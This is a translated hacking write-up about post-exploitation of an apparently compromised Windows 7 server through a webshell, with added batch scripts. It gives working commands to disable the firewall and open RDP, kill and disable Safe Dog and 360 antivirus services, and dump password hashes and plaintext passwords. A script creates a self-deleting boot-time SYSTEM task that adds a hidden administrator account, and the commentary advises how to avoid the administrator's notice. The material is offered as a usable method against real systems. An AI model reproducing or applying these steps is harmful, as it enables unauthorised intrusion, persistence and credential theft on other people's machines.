Thoughts: Safe Dog + the full 360 suite, some tips for adding an account
Background: one day, a group of people in the chat.
Then one of them took on a nice job and was never heard from again. As the saying goes: "if you aren't blind, don't rely on your ears alone to understand it!", or else you had better think about insurance.
Luckily, the shell already had SYSTEM privileges.
I thought this would be very simple......
systeminfo: the query showed Windows 7 Ultimate, x86 by the look of it.
Yes, it is Win7, but 3389 would not connect. Ran tasklist /svc on a whim: the full 360 suite + Server Safe Dog.
netstat -ano showed port 3389 listening.
So the candidate causes were: 1. TCP/IP filtering 2. the firewall 3. Safe Dog interception 4. in an intranet deployment, the IP you see through China Chopper is usually an internal address.
That IP is not necessarily accurate; if you don't believe it, try a site behind a CDN. I recommend not connecting to the server by domain name, because..... Get the server's real IP with ipconfig: XX.XX (confirmed to be a public IP).
telnet from my own machine to the target IP and port: no connection.
query user: the administrator was logged on, account name administrator.
Analysis of the above: I use Win7 a lot myself. With Win7 + the full 360 suite, every 360 check-up nags you to turn on the firewall. And since the administrator is using Win7 as a server, the chance that he enabled Safe Dog's remote desktop guard is small. To test this I ran the following command to disable the firewall:
    netsh firewall set opmode disable
It was indeed the firewall; after that the connection went through.
With that, job done; handed it over to Cool.
Note here: my local machine is XP, and its mstsc would not connect; replace it with the mstsc from Win7 or later. Conversely, some servers or machines need an mstsc older than Win7 to connect. (For cases where 3389 cannot be connected at all, see "Breaking various access restrictions on 3389 connections".)
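As an added example (not part of the original post), here is the 3389 triage above collected into one batch file: is RDP listening, is it disabled or moved in the registry, which address the box really has, who is on the console, which security products are running, and what the firewall state is. It assumes a cmd shell on the target (for instance through a webshell) and that the Safe Dog and 360 process names contain the substrings "safedog" and "360"; the two commands that change anything are left commented out.

```batch
@echo off
rem Added example, not from the original post: the 3389 triage the write-up walks
rem through, run from a cmd shell on the target. Everything below is read-only; the
rem two write actions at the end are commented out.

echo === Is RDP actually listening? ===
netstat -ano | findstr /c:":3389"

echo === RDP disabled, or moved off the default port? ===
rem fDenyTSConnections = 1 means Remote Desktop is switched off.
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

echo === Which address the box really has (intranet vs. public) ===
rem Label text is localized; on a non-English system just run ipconfig without findstr.
ipconfig | findstr /i /c:"IPv4"

echo === Is anyone on the console right now? ===
query user

echo === Security products among the running processes ===
rem Assumption: Safe Dog / 360 process names contain these substrings.
tasklist /svc | findstr /i "safedog 360"

echo === Windows Firewall state per profile (Vista/7 and later: advfirewall) ===
netsh advfirewall show allprofiles state

rem The post's fix, which switches the whole firewall off. "netsh firewall" is the
rem pre-Vista syntax; Windows 7 still accepts it but prints a deprecation notice:
rem   netsh firewall set opmode disable
rem Narrower equivalent: open only inbound TCP/3389 and leave the rest alone.
rem   netsh advfirewall firewall add rule name="rdp-in" dir=in action=allow protocol=TCP localport=3389
```

The narrower rule is the one to prefer when you can: it restores only the port you need instead of dropping every profile's filtering, and a single extra allow rule is far less likely to be noticed by the administrator than a firewall that has gone from on to off.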
-------------------------------------------- I thought that was it. After a day of meetings, I saw Cool in the group after dinner that evening.
Cool (Shuai Niu) still hadn't gotten into the server. OK. Don't study the directory permissions, don't go straight at the server. Afterwards I swapped jobs with Niu and continued escalating on his box. Since it was already SYSTEM and no overflow was needed, just add an account. Ran net user xxxxx ............ No echo. OK, Safe Dog is interfering (expected that long ago). Uploaded my own cmd.exe plus net1.exe renamed to net111.
The result disappointed me.
Tried running the exe in different ways, without quotes, several AV-evasion builds.
No. It must be the dog again: in the webshell, every program run with an .exe suffix gets caught. I won't go on about China Chopper. Go into the directory and look for the root password.
Because the website directory was very restricted, nothing could be uploaded or modified. With 360 and Safe Dog on the server, I temporarily gave that up. Since net doesn't work, dump the hashes directly. getpass is unavailable in some situations; to avoid that I went for the hashes first.
The hash was incomplete and could not be cracked. Second, used getpass to grab the plaintext password: it was blank. Tried it, the password is indeed blank, but Group Policy blocks it: an account with a blank password is only allowed to log on locally; remote logon is refused.
A remote-control trojan would be killed on sight. Meanwhile I tried a pile of API-based add-account tools: aio clone, F4ck, Seay, dadan, wlozz, add... none of them could add the account, and many were killed outright. Tried vbs and bat scripts to add the account: no. Tried ending the Safe Dog process: find the dog's processes, kill them in a bat batch, and append the other commands to the end of the batch.
Generally the service is stopped first. Below are the commands that allow the exe and so on; run them in China Chopper.
Only Safe Dog was temporarily ended; the other commands did not go through. Forced to it, the only option left was a startup item. Since it loads on every boot and a boot script runs before the dog does, adding the account before the dog is up is theoretically feasible. Modified the script and added it as a startup item. Didn't even check whether it had actually been added to startup. Straight shutdown -r -t 5 to restart the server, then went to the restroom.
It might not even have been added to startup, but I got a pleasant surprise after the restart. You read that right: 360sd was gone (in fact it is not started at boot). query user showed no user logged on. If the user logs on, the AV services come up immediately (try it if you don't believe me). This time no AV service was running, so I continued with the API add-account tools. That's right: if things don't work, restarting the server may surprise you. (I once escalated on a server, and after I restarted it Safe Dog came up and intercepted the shell.)
- ConfigService can be used to change the startup type: disable the autostart of Safe Dog and 360 before restarting the server.
- Clone failed. Check whether the password hash is the same. Another round of API add-account: no. Finally dug out the multi-function artifact; the front part is masked.
The account was successfully added through the registry.
net user cannot query it, so I did not know whether it had been added. Here, use getpass or pw7 to check.
The result speaks for itself. Look, this API works. Added.
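Added example, not the author's script: one way to put the second half of the post together, assuming a cmd shell running as SYSTEM on the target. It covers the blank-password policy check behind the "local logon only" refusal above, the ConfigService step (done here with sc config), an add-account script that runs at boot before the guard process, and the registry check for the new account that the post falls back on when net user is hooked. The service names, the account name and password, and the temp path are placeholders (the post names none of them; take the real service names from sc query or tasklist /svc). The post also does not say which startup mechanism it used; a boot-time scheduled task running as SYSTEM is assumed here as one way to do it.

```batch
@echo off
rem Added example, not from the original post. Run as SYSTEM from the webshell's cmd.
rem Assumptions (not from the post): service names, user name, password and temp path
rem are placeholders; a boot-time scheduled task is used as the "startup item".

rem --- 1. Why the existing admin with a blank password is useless over RDP ---
rem LimitBlankPasswordUse = 1 is the policy "limit blank passwords to console logon only".
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse

rem --- 2. Keep Safe Dog / 360 from coming back after the reboot ---
rem (the post's ConfigService step; sc config does the same). Replace the placeholders
rem with the service names reported by "sc query" / "tasklist /svc".
set SVC_DOG=SafeDogPlaceholderService
set SVC_360=360PlaceholderService
sc config %SVC_DOG% start= disabled
sc config %SVC_360% start= disabled

rem --- 3. Account-adding script, written to disk so it can run before the guard loads ---
set ADDBAT=C:\Windows\Temp\addusr.bat
set NEWUSER=svc_backup
set NEWPASS=Ex4mpl3-P@ss!
> "%ADDBAT%"  echo @echo off
>> "%ADDBAT%" echo net user %NEWUSER% %NEWPASS% /add
>> "%ADDBAT%" echo net localgroup administrators %NEWUSER% /add
>> "%ADDBAT%" echo schtasks /delete /tn addusr /f

rem Boot-time task as SYSTEM: fires at startup, no interactive logon needed, and so it
rem gets its net user in before a logon-triggered AV service is up. The task deletes
rem itself (last line of the script) so it does not re-run on every boot.
schtasks /create /tn addusr /tr "%ADDBAT%" /sc onstart /ru SYSTEM /f

rem --- 4. Reboot (the post's shutdown -r -t 5); left commented out here ---
rem shutdown -r -t 5

rem --- 5. After the reboot: verify without net user, which the dog hooks ---
rem The SAM user-name list is only readable as SYSTEM; this is the registry check.
reg query "HKLM\SAM\SAM\Domains\Account\Users\Names"
rem WMI is a second path that does not go through net.exe/net1.exe (it may still be
rem intercepted by a different hook; treat a missing row as "check again", not "failed").
wmic useraccount get name,sid,disabled
query user
```

Two cautions a practitioner would add: whether a boot-time task actually beats the guard process is a race that depends on service start order, so treat "theoretically feasible" as something to verify with the registry check rather than assume; and disabling the autostart of named services is noisy in the event log and visible to the next administrator who looks, which is the trade-off the post's "restart the server and be surprised" approach implicitly accepts.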
Privilege escalation done, Win7 system. Did you notice that 360 AV had been started? Attached is a screenshot of the server's security configuration:
Summary: many people think that with SYSTEM privileges they can do anything. Safe Dog and 360 are a good lesson for those people.
Attack and defense always advance through confrontation. The author thought a lot and tinkered for a long time, and in the end bypassed the protection of both security products and added a user. The patience and ideas are commendable. This article aims to share ideas and give you a way of thinking about bypassing security software. I hope you gain something from reading it. :)